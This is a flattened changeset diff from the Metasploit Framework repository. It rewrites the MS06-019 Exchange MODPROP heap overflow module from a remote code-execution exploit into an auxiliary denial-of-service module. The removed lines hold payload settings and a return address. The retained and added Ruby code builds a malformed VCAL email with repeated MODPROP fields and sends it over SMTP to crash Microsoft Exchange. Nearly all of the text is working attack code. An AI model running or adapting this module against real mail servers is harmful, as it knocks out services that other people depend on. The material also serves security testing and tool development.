Changeset 4836
- Timestamp:
- 05/01/07 22:34:49 (1 year ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/tags/framework-3.0/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb
r4831 r4836 15 15 module Msf 16 16 17 class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote17 class Auxiliary::Dos::Windows::Smtp::MS06_019_EXCHANGE < Msf::Auxiliary 18 18 19 19 include Exploit::Remote::Smtp … … 23 23 'Name' => 'MS06-019 Exchange MODPROP Heap Overflow', 24 24 'Description' => %q{ 25 This module exploits a heap overflow vulnerability in MS25 This module triggers a heap overflow vulnerability in MS 26 26 Exchange that occurs when multiple malformed MODPROP values 27 27 occur in a VCAL request. … … 37 37 38 38 ], 39 'Privileged' => true, 40 'DefaultOptions' => 41 { 42 'EXITFUNC' => 'thread', 43 'SUBJECT' => 're: Your Brains', 44 }, 45 'Payload' => 46 { 47 'Space' => 614, # XXX 48 'EncoderOptions' => 49 { 50 'BufferRegister' => 'EDX', 51 } 52 }, 53 'Platform' => 'win', 54 'Targets' => 55 [ 56 # alphanum rets :(, will look more into it later 57 ['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x77364650 }], 58 ], 59 'DisclosureDate' => 'Nov 12 2004', 60 'DefaultTarget' => 0)) 39 'DisclosureDate' => 'Nov 12 2004')) 40 41 register_options( 42 [ 43 OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains']) 44 ], self.class) 45 61 46 end 62 47 63 def exploit 64 print "Connected; Sending mail... " 48 # 49 # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class 50 # 51 def run 52 53 connect_login 65 54 66 55 modprops = ['attendee', 'categories', 'class', 'created', 'description', … … 69 58 'status', 'summary', 'transp', 'uid'] 70 59 71 60 #modprops = ['dtstamp'] 72 61 73 62 modpropshort = "" … … 89 78 } 90 79 91 boundry = 80 boundry = rand_text_alphanumeric(8) + "." + rand_text_alphanumeric(8) 92 81 93 82 … … 95 84 # reliable, and gives crashes in better spots of you use these modprops: 96 85 97 modpropshort ="dtstamp,"98 modproplong ="dtstamp, dtstamp,"99 modpropbusted = 86 modpropshort = "dtstamp," 87 modproplong = "dtstamp, dtstamp," 88 modpropbusted = "DTSTAMP:\r\n" 100 89 101 90 mail = "From: #{datastore['MAILFROM']}\r\n" … … 123 112 mail << "\r\n--#{boundry}\r\n" 124 113 mail << "\r\n.\r\n" 114 125 115 126 print "\n\n" + mail + "\n\n" 127 128 handler 129 connect_login 116 print_status("Sending message...") 130 117 sock.put(mail) 131 118 sock.put("QUIT\r\n")
